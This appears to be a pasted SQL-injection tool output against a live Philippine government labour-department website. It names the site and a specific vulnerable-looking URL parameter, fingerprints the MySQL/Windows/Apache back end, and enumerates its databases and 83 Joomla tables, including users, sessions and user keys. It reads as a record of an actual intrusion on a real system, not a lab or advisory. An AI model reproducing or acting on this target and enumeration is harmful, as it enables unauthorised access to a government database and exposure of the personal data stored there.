.gov Government

.ph Philippines

DOLE-Bureau Of Working Conditions

Republic Of The Philippines

Department Of Labor And Employment

Bureau Of Working Conditions

Intramuros, Manila

https://bwc.dole.gov.ph/index.php/forms?layout=edit&id=86

the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache
the back-end DBMS: MySQL >= 5.0 (MariaDB fork)

available databases [2]:
[+] information_schema
[+] yxzahfudrf_hrystlsd

Database: yxzahfudrf_hrystlsd
[83 tables]
+----------------------------+
| #__action_log_config       |
| #__action_logs_extensions  |
| #__action_logs_users       |
| #__action_logs             |
| #__ak_profiles             |
| #__ak_stats                |
| #__ak_storage              |
| #__akeeba_common           |
| #__assets                  |
| #__associations            |
| #__banner_clients          |
| #__banner_tracks           |
| #__banners                 |
| #__categories              |
| #__contact_details         |
| #__content_frontpage       |
| #__content_rating          |
| #__content_types           |
| #__content                 |
| #__contentitem_tag_map     |
| #__core_log_searches       |
| #__extensions              |
| #__fields_categories       |
| #__fields_groups           |
| #__fields_values           |
| #__fields                  |
| #__finder_filters          |
| #__finder_links_terms0     |
| #__finder_links_terms1     |
| #__finder_links_terms2     |
| #__finder_links_terms3     |
| #__finder_links_terms4     |
| #__finder_links_terms5     |
| #__finder_links_terms6     |
| #__finder_links_terms7     |
| #__finder_links_terms8     |
| #__finder_links_terms9     |
| #__finder_links_termsa     |
| #__finder_links_termsb     |
| #__finder_links_termsc     |
| #__finder_links_termsd     |
| #__finder_links_termse     |
| #__finder_links_termsf     |
| #__finder_links            |
| #__finder_taxonomy_map     |
| #__finder_taxonomy         |
| #__finder_terms_common     |
| #__finder_terms            |
| #__finder_tokens_aggregate |
| #__finder_tokens           |
| #__finder_types            |
| #__languages               |
| #__menu_types              |
| #__menu                    |
| #__messages_cfg            |
| #__messages                |
| #__modules_menu            |
| #__modules                 |
| #__newsfeeds               |
| #__overrider               |
| #__postinstall_messages    |
| #__privacy_consents        |
| #__privacy_requests        |
| #__redirect_links          |
| #__schemas                 |
| #__session                 |
| #__tags                    |
| #__template_styles         |
| #__ucm_base                |
| #__ucm_content             |
| #__ucm_history             |
| #__update_sites_extensions |
| #__update_sites            |
| #__updates                 |
| #__user_keys               |
| #__user_notes              |
| #__user_profiles           |
| #__user_usergroup_map      |
| #__usergroups              |
| #__users                   |
| #__utf8_conversion         |
| #__viewlevels              |
| #__wf_profiles             |
+----------------------------+
